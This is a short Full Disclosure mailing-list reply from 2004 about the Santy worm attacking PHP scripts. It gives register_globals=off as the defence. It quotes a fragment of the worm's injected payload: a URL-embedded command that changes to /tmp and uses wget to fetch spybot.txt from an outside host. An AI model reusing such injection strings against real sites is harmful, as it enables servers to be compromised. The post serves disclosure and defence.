Full Disclosure mailing list archives

Re: New Santy-Worm attacks *all* PHP-skripts


From: Pekka Savola <pekkas () netcore fi>
Date: Sat, 25 Dec 2004 21:59:50 +0200 (EET)

On Sat, 25 Dec 2004, Juergen Schmidt wrote:
It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

And AFAICS, this can be prevented by setting register_globals=off in php.ini.

--
Pekka Savola                 "You each name yourselves king, yet the
Netcore Oy                    kingdom bleeds."
Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: